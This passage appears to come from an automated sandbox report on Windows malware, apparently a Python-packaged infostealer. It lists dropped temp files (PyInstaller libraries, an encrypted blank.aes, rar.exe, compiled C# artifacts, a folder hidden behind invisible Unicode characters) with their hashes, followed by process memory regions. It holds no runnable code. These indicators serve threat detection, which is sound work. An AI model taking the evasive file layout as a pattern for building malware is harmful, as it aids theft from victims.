        1abe2efff04be307b6f9f37e449b647098ed27b99d1dda6bdc64a96e4690bed6

        SHA512

        4052f37b7894f8a1ef184190f22b545e79f80533835056c6fe5a64981d008352cae530b93dfa7da636da930d6c851fb4178de013b28fd8196420382012df3707

      • C:\Users\Admin\AppData\Local\Temp\_MEI21802\base_library.zip

        Filesize

        1.3MB

        MD5

        5f68cb30916dc7ea416375f05e8de0f4

        SHA1

        d9bcfd9b3bb4ae98a269d780cf619b628df1c871

        SHA256

        4c72322c1d7b759d0e0d478c86ed198a5feae5f1f306366ea9388bb804f0d9ed

        SHA512

        4e28be212ce619ef0e75325ce899a5b66d62ed458a41e5c5e293efc05e440186501b0be7644a4581cbfdd0988718d3021376340b9a13a01dcbf39553577b3de8

      • C:\Users\Admin\AppData\Local\Temp\_MEI21802\blank.aes

        Filesize

        110KB

        MD5

        1c88358719de2229bf0b430204e1b28c

        SHA1

        6c932ac3ff1a8abaa7397d47972376bfbc6d6844

        SHA256

        8cd57f3cfd1be65e7224a2b34f9d32f277a754cd09eea989d01932dec431b825

        SHA512

        ee2f167e4003ee15c7eec684db612db688b4c63b5fdfc71790767b17ec387d91f7af54b4571f22546505a2abc7d62b6913858bf1551830888b3e74d6389773c3

      • C:\Users\Admin\AppData\Local\Temp\_MEI21802\blank.aes

        Filesize

        110KB

        MD5

        764dd8813ce3d508aa00f90d0aa8acf4

        SHA1

        e6b5d31376b68a72c23c2ad5e5b401851b4848b5

        SHA256

        7704fc78889a35b1a5929d17bc57a2cbf458235327cb1fc7060ec70e6fcd729a

        SHA512

        8836bb429b8eacfb66d703498de99e603ebf62f6f22bb585eeb9583306093914c75e807af63336a6e371c921b8f27560725ed9d88a6e8f78952ec052f4e46915

      • C:\Users\Admin\AppData\Local\Temp\_MEI21802\libcrypto-3.dll

        Filesize

        1.6MB

        MD5

        bc85029244d404c160559311fdbd1c31

        SHA1

        d766327377615f4805095265af4e1fb6c3ac5fa1

        SHA256

        bd11a1aed1a556c64c6b0543d2ebc24b82edae20149187298e751cb6b5278948

        SHA512

        6fdc7d96460e00695c925d8858665799e65e76950de9a143a7c1ee5b2d35356dde4c8fbca6df98d69290d5f1433727bedafeb2624057443c40b43a015efcebb0

      • C:\Users\Admin\AppData\Local\Temp\_MEI21802\libffi-8.dll

        Filesize

        29KB

        MD5

        08b000c3d990bc018fcb91a1e175e06e

        SHA1

        bd0ce09bb3414d11c91316113c2becfff0862d0d

        SHA256

        135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

        SHA512

        8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

      • C:\Users\Admin\AppData\Local\Temp\_MEI21802\libssl-3.dll

        Filesize

        223KB

        MD5

        b457df62ae082d2893574ec96b67ab3d

        SHA1

        6ca688f3b9a76cfebc010fa5f39f20a3487fbe63

        SHA256

        716ccd55d1edbade9b968f60c6d9007ab7ab59193d08ae62d0187bf593495f94

        SHA512

        758966e9463462d046fbc476459e52f35b1940b7f008f63417d86efe16b328cee531d8d97ee82afaa99424252caadb8bb7688449323e834b97f204303965b794

      • C:\Users\Admin\AppData\Local\Temp\_MEI21802\python313.dll

        Filesize

        1.9MB

        MD5

        6369ae406d9215355d962e5a18d5fb8d

        SHA1

        9bb53eb37cdd123acf5271e539afb1229f31277f

        SHA256

        68f10724dee2e266e7daea7a70cec6af334ba58a2395837cd3ae86564dec7f86

        SHA512

        24a83487b6eec3a60436f2ad177c9f11848420123080eb7a500a442bc03718998a12a94d666d5e125a32b98c378559e921b1c31ab85f40e435faafca402d4ff8

      • C:\Users\Admin\AppData\Local\Temp\_MEI21802\rar.exe

        Filesize

        615KB

        MD5

        9c223575ae5b9544bc3d69ac6364f75e

        SHA1

        8a1cb5ee02c742e937febc57609ac312247ba386

        SHA256

        90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

        SHA512

        57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

      • C:\Users\Admin\AppData\Local\Temp\_MEI21802\rarreg.key

        Filesize

        456B

        MD5

        4531984cad7dacf24c086830068c4abe

        SHA1

        fa7c8c46677af01a83cf652ef30ba39b2aae14c3

        SHA256

        58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

        SHA512

        00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

      • C:\Users\Admin\AppData\Local\Temp\_MEI21802\select.pyd

        Filesize

        26KB

        MD5

        c6d47964b8a397be5d5a3509e318c434

        SHA1

        919ebc4d9d10aa6c6e3cfbd64721e332c9aaa42d

        SHA256

        5e2cc7696b0046a6214294ecb20edac43cb1d9075beba1286ecf267eb8b8e978

        SHA512

        7e1d19a3e535844180f2cbc7a0a5d29af62f736566117ce93e286ba85a8db06ac855554a701ebea613e1dea45a2ee55633ddaf69fe840e7cda6c9f0e79c67234

      • C:\Users\Admin\AppData\Local\Temp\_MEI21802\sqlite3.dll

        Filesize

        661KB

        MD5

        c34a35bd895e76a7f752e4d722c727bb

        SHA1

        5d9a14554cfb8ddd87b375100f8983a064c4b549

        SHA256

        01ad385c0c2e1800093c159c30400f0f0489fb742503374f628e1448e4bbb098

        SHA512

        500e7ccfcf3480969fbe0bb1d8595b074ea02d7959418685eec0a56c88c7c45d7347c146e2616d5ba8bf63765c6ca4b83e6e3c5b1c62c12c141abe47aa19b004

      • C:\Users\Admin\AppData\Local\Temp\_MEI21802\unicodedata.pyd

        Filesize

        262KB

        MD5

        e6f82f919d6da66ff6b54ef3e0d62d7f

        SHA1

        ce9e611ee55b306a52022e643598b5db7dcc086f

        SHA256

        e79fcd94197daca63cd174eb3ba0306507325dc72241731834083be7f17af62f

        SHA512

        9add72d49fbe10d6bf224310fc7fda532f7b64819e3c6b7ac301cff49495d5655722fcf2ea062ea22ea43d06e0cbcc97d0364a16b63c6873eef575fd5823a7de

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m3kvi4au.t2d.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\lsvlbhva\lsvlbhva.dll

        Filesize

        4KB

        MD5

        9c7cbd40a8a45458e126cd03fb33e4e6

        SHA1

        8152b0d1848d4ed2f573df3e9377017a131978af

        SHA256

        f5474346a1e7d4310418ee575a032eb073102723564fcec00ac23bfd1824924f

        SHA512

        431392f2a5354d0a6d4995811660b3cb0b4e1db24e34e52d19c735430086abca8307190f6ec9d68e1bf15e69f667d1f232d5544435e09ae71f778ddc4fd8a12b

      • C:\Users\Admin\AppData\Local\Temp\    ‌‏   ‍\Display (1).png

        Filesize

        425KB

        MD5

        e734be05e28531cba7179e5164a997b9

        SHA1

        8c20064a46aba45540254bad24cf5224b2decfe5

        SHA256

        83397d7fa5f7925b721793aba90376eecbe0316a964f7e531f51a5e35ff160de

        SHA512

        c7cf3678aabd6afa76a40fa49078460feb328915e2e99afa9ffe01397065c4ea3115ee9bf7a6d36db2d12c9466876081b8e4eb4ca37c26061a31da5e671f608b

      • \??\c:\Users\Admin\AppData\Local\Temp\lsvlbhva\CSC9544EC9948C84EC6B35724D927717A32.TMP

        Filesize

        652B

        MD5

        905e86cc93b849d24bc67167148cd695

        SHA1

        3510b7d5024888de8d64952f5d2aa6145ab0937b

        SHA256

        b49497228b5b4be5a8635fbe5a9a78a1e812d8c4cf8bce0646214477ab8f9efd

        SHA512

        afdff249a7aac55bccf955d7b74704c9d6cb900a6f0dee02db08ae102494d5ce17ce822b7ab80fb36008b6b099293801ace6715c32cc8e0d24a23c04557110b6

      • \??\c:\Users\Admin\AppData\Local\Temp\lsvlbhva\lsvlbhva.0.cs

        Filesize

        1004B

        MD5

        c76055a0388b713a1eabe16130684dc3

        SHA1

        ee11e84cf41d8a43340f7102e17660072906c402

        SHA256

        8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

        SHA512

        22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

      • \??\c:\Users\Admin\AppData\Local\Temp\lsvlbhva\lsvlbhva.cmdline

        Filesize

        607B

        MD5

        e1d540a7b4129711ced91e6381591dad

        SHA1

        ee467ac10518f42f1f045e471de6ed07e8fb137d

        SHA256

        153f7458fa0e4706d6b4d6691cbd6c6d23e5f296ea45d683ff763620c844bfde

        SHA512

        343c5780e69340a03c6916e294b5c38028aef9f4e0648986e4adf2ae989b62ec105f75a3430c7e4651b5529e43cbbdd4d281ff0469bb4c7744d2f320804e4d31

      • memory/1588-80-0x000001A64BE70000-0x000001A64BE92000-memory.dmp

        Filesize

        136KB

      • memory/1696-125-0x000002517A920000-0x000002517A928000-memory.dmp

        Filesize

        32KB

      • memory/2964-79-0x00007FFBDCF60000-0x00007FFBDD013000-memory.dmp

        Filesize

        716KB

      • memory/2964-167-0x00007FFBDD020000-0x00007FFBDD1A9000-memory.dmp

        Filesize

        1.5MB

      • memory/2964-77-0x00007FFBED790000-0x00007FFBED79D000-memory.dmp

        Filesize

        52KB

      • memory/2964-75-0x00007FFBECF30000-0x00007FFBECF44000-memory.dmp

        Filesize

        80KB

      • memory/2964-69-0x00007FFBDD350000-0x00007FFBDD9B7000-memory.dmp

        Filesize

        6.4MB

      • memory/2964-71-0x00007FFBDC8F0000-0x00007FFBDCE23000-memory.dmp

        Filesize

        5.2MB

      • memory/2964-58-0x00007FFBF0730000-0x00007FFBF0755000-memory.dmp

        Filesize

        148KB

      • memory/2964-72-0x0000015AFADE0000-0x0000015AFB313000-memory.dmp

        Filesize

        5.2MB

      • memory/2964-73-0x00007FFBEC2D0000-0x00007FFBEC39E000-memory.dmp

        Filesize

        824KB

      • memory/2964-47-0x00007FFBF0870000-0x00007FFBF0897000-memory.dmp

        Filesize

        156KB

      • memory/2964-70-0x00007FFBECE30000-0x00007FFBECE63000-memory.dmp

        Filesize

        204KB

      • memory/2964-64-0x00007FFBF1EE0000-0x00007FFBF1EED000-memory.dmp

        Filesize

        52KB

      • memory/2964-48-0x00007FFBF5CC0000-0x00007FFBF5CCF000-memory.dmp

        Filesize

        60KB

      • memory/2964-63-0x00007FFBED0D0000-0x00007FFBED0E9000-memory.dmp

        Filesize

        100KB

      • memory/2964-52-0x00007FFBF0840000-0x00007FFBF086B000-memory.dmp

        Filesize

        172KB

      • memory/2964-144-0x00007FFBF0730000-0x00007FFBF0755000-memory.dmp

        Filesize

        148KB

      • memory/2964-50-0x00007FFBF2070000-0x00007FFBF208A000-memory.dmp

        Filesize

        104KB

      • memory/2964-60-0x00007FFBDD020000-0x00007FFBDD1A9000-memory.dmp

        Filesize

        1.5MB

      • memory/2964-188-0x00007FFBF0730000-0x00007FFBF0755000-memory.dmp

        Filesize

        148KB

      • memory/2964-193-0x00007FFBDC8F0000-0x00007FFBDCE23000-memory.dmp

        Filesize

        5.2MB

      • memory/2964-192-0x00007FFBECE30000-0x00007FFBECE63000-memory.dmp

        Filesize

        204KB

      • memory/2964-191-0x00007FFBF1EE0000-0x00007FFBF1EED000-memory.dmp

        Filesize

        52KB

      • memory/2964-190-0x00007FFBED0D0000-0x00007FFBED0E9000-memory.dmp

        Filesize

        100KB

      • memory/2964-189-0x00007FFBDD020000-0x00007FFBDD1A9000-memory.dmp

        Filesize

        1.5MB

      • memory/2964-187-0x00007FFBF0840000-0x00007FFBF086B000-memory.dmp

        Filesize

        172KB

      • memory/2964-186-0x00007FFBF2070000-0x00007FFBF208A000-memory.dmp

        Filesize

        104KB

      • memory/2964-185-0x00007FFBEC2D0000-0x00007FFBEC39E000-memory.dmp

        Filesize

        824KB

      • memory/2964-184-0x00007FFBF0870000-0x00007FFBF0897000-memory.dmp

        Filesize

        156KB

      • memory/2964-183-0x00007FFBF5CC0000-0x00007FFBF5CCF000-memory.dmp

        Filesize

        60KB

      • memory/2964-182-0x00007FFBDCF60000-0x00007FFBDD013000-memory.dmp

        Filesize

        716KB

      • memory/2964-181-0x00007FFBED790000-0x00007FFBED79D000-memory.dmp

        Filesize

        52KB

      • memory/2964-180-0x00007FFBECF30000-0x00007FFBECF44000-memory.dmp

        Filesize

        80KB

      • memory/2964-168-0x00007FFBDD350000-0x00007FFBDD9B7000-memory.dmp

        Filesize

        6.4MB

      • memory/2964-25-0x00007FFBDD350000-0x00007FFBDD9B7000-memory.dmp

        Filesize

        6.4MB